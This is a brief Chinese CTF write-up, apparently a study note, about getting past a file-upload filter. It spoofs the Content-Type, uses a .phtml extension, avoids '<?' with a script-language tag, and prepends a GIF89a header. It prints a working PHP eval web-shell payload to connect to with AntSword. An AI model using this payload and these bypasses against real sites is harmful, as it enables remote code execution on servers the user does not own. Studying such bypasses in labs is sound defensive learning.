复习以下文件上传,
本题考点:采用黑名单过滤,对文件类型设置白名单,对文件内容头进行比对,过滤<?
首先常规上传一波,发现提示不是一个图片
将Content-Type改成Content-Type: image/jpeg,又提示文件后缀不能是php
这里是一个黑名单 ,但是没有过滤phtml,改成2.phtml绕过,发现检测内容哦中包含<?
内容修改成:<script language=”php”>@eval($_POST[‘cmd’]);</script>,但仍提示不是图片,还是没有绕过对内容的检验,因此想到加GIF头绕过
内容修改成:
GIF89a
<script language=”php”>@eval($_POST[‘cmd’]);</script>
最后成功绕过,连接蚁剑即可
